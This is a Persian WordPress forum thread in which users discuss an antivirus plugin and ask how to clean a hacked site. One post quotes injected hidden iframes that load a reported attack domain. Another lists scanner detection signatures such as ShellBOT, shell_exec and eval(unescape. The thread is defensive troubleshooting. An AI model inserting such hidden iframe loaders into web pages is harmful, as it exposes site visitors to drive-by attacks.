افزونه آنتی ویروس فارسی « انجمن وردپرس فارسی

Mostafa

آفلاین
ناظم
تعداد نوشته‌ها: ۵۲۷۶
تشکر شده: ۵۷۷۷ بار
# نوشته شده: ۱۵ سال پیش
۱۲ فروردین ۱۳۸۸ - ۱۲:۰۳

سلام, دوستان سایتم فعلا غیر فعاله! دیگه مجبور شدم, افزونه رو اینجا بزارم :-(
قبلا naghies در موردش توضیح داده دیگه من توضیح نمیدم :D
لینک دانلود
آرمان

آفلاین
عضو
تعداد نوشته‌ها: ۳۷۳
تشکر شده: ۲۷ بار
# نوشته شده: ۱۵ سال پیش
۱۳ فروردین ۱۳۸۸ - ۱۲:۳۷

اینا رو لطفن بعدن توی یه تاپیک مجزا قرار بده که دیگه همه بدونن برای افزونه‌های فارسی به کجا مراجعه کنن :-)
AminSanaei

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۳
تشکر شده: ۲۶ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۲:۳۰

جدیداً مثل اینکه یه تروجان تو کدهای وردپرسم جاخوش کرده. این آنتی ویروسها میتونن اونو از بین ببرن؟ کلاً راه حل امنیتی اینکه وردپرس دچار ویروس نشه چیه؟ :?
Mostafa

آفلاین
ناظم
تعداد نوشته‌ها: ۵۲۷۶
تشکر شده: ۵۷۷۷ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۲:۳۶

نه باید خودتون از ببین ببریدش
افزونه فقط بهتون اطلاع مید

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
امین
websoft

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۴
تشکر شده: ۴۹ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۳:۲۱

بله : http://www.wpantivirus.com
AminSanaei

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۳
تشکر شده: ۲۶ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۴:۰۷
خوب من الآن دیدم که هوار تا کد مخرب تو فایلهام دارم
iframe src" iframes can sometimes be used by hackers to load their own adverts and code on your site.
که فقط یکیش اینه
```
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="h
```
برای رفع اینها چکار باید بکنم. Akismet میتونه جلو این ویروسها رو بگیره؟
websoft

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۴
تشکر شده: ۴۹ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۴:۲۴
اول اينكه آي فريم براي تبليغات هم خوب ميتونه استفاده بشه كه ممكنه به اون‌ها حساس باشه ، البته با دستور دومي كه شما داديد و بررسي لينك موجود ( دستي چك كنيد ) ، اين كد به پيوند داده شده متصل ميشه كه لينك مورد نظر مخرب هست. سنتي :-) حذفش كنيد.
```
Reported Attack Site!
This web site at jl.chura.pl has been reported as an attack site and has been blocked based on your security preferences.
```
AminSanaei

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۳
تشکر شده: ۲۶ بار
# نوشته شده: ۱۴ سال پیش
۱۹ اردیبهشت ۱۳۸۸ - ۱۶:۱۰

خیلی زیادن :-( اگه از نو وردپرس رو نصب کنم از بین میرن؟ اینها از تو کامپیوتر من وارد شدن؟ چه جوری میرن لای کدهای دیگه؟ :?
AminSanaei

آفلاین
عضو
تعداد نوشته‌ها: ۲۳۳
تشکر شده: ۲۶ بار
# نوشته شده: ۱۴ سال پیش
۲۰ اردیبهشت ۱۳۸۸ - ۱۴:۰۳
من دوباره وردپرس رو نصب کردم. ویروسها خیلی کم شدن و فقط موندن اینها :?. اینها رو ویروس یاب به صورت رنگ زرد نشون داده
```
String.fromCharCode

iframe src

ShellBOT

uname -a

shell_exec

YW55cmVzdWx0cy5uZXQ=

<u style='display:none'>

eval(unescape

$_COOKIE["yahg"]
```
مثلاً این نمونه کدی هست که توش او بخش قرار داره:

home/mortabet/public_html/wp-includes/js/scriptaculous/prototype.js
```
return this.slice(0, this.length - 1) +
   String.fromCharCode(this.charCodeAt(this.length - 1) + 1);
    },

    times: function(count) {
    return count < 1 ? '' : new Array(count + 1).join(this);
    },

    camelize: function() {
    var parts = this.split('-'), len = parts.length;
    if (len =
```
عبدالماجد شه بخش ( ایجباری )

آفلاین
عضو فعال
تعداد نوشته‌ها: ۱۰۳۱
تشکر شده: ۱۴۳۲ بار
# نوشته شده: ۱۳ سال پیش
۱ اردیبهشت ۱۳۹۰ - ۱۷:۰۰
خوب تایپیک قدیمی هست ولی نیازی نیست من دوبااره از ال توضیح بدم و بگم چی شده . خلاصه افزونه ی anti virus رو نصب کردم و به تعداد زیاد خطا داد با رنگ قرمز و به یه سری از توابع مشکوک شده بود :
```
bstr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
```
به تابع :
```
file_get_contents
```
گیر داده بود .
یا به
fopen
یه جایی گیر داده بود ولی من از چند تا ترسیدم گویا مخرب باشن :
```
DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K
```
و
```
ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E
```
و
```
ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm
```
و ..... این آخریا شاید کد مخرب باشن یا اینکه به خاطر انکود بودن بهشون گیر داده .
اگه دوستان اطلاعی داره لطف کنه راهنمایی کنه .
Mostafa

آفلاین
ناظم
تعداد نوشته‌ها: ۵۲۷۶
تشکر شده: ۵۷۷۷ بار
# نوشته شده: ۱۳ سال پیش
۳ اردیبهشت ۱۳۹۰ - ۰۰:۵۵

احتمالا تابع fopen یک فایلی رو باز می‌کنه که محتویاتش اون رشته‌ها باشن! بررسی کن ببین توی سورس با چه الگوریتمی code می‌شه.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
عبدالماجد شه بخش ( ایجباری )

احتمالا تابع fopen یک فایلی رو باز می‌کنه که محتویاتش اون رشته‌ها باشن!

بررسی میکردم ظاهرا هیچ فایلی رو باز نمیکرد .

بررسی کن ببین توی سورس با چه الگوریتمی code می‌شه.

کل کد :

<?php $str ='CQk8L3A+DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K/ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E+IHwg2KjYsdqv2LHYr9in2YbYr9mHINi02K/ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm+2YjYs9iq2Ycg2YfYp9mKINmI2LHYr9m+2LHYs9iMINmB2LHZiNi02q/Yp9mHINm+2YjYs9iq2YfigIzZh9in24wg2YjYsdiv2b7YsdizIj7YqtmF2LI8L2E+PC9wPg0KCQk8ZGl2IGNsYXNzPSJjbGVhciI+PC9kaXY+DQoJPC9kaXY+';echo base64_decode($str);?>

ممنون .

eskafild

آفلاین
عضو
تعداد نوشته‌ها: ۱۰۷
تشکر شده: ۱۷ بار
# نوشته شده: ۱۲ سال پیش
۱۳ آبان ۱۳۹۰ - ۱۵:۰۶

سلام
لینک خرابه دوباره آپلودش کنید :(

وردپرس فارسی

انجمن

افزونه آنتی ویروس فارسی (۱۳ نوشته)

درباره‌ی این موضوع

برچسب‌ها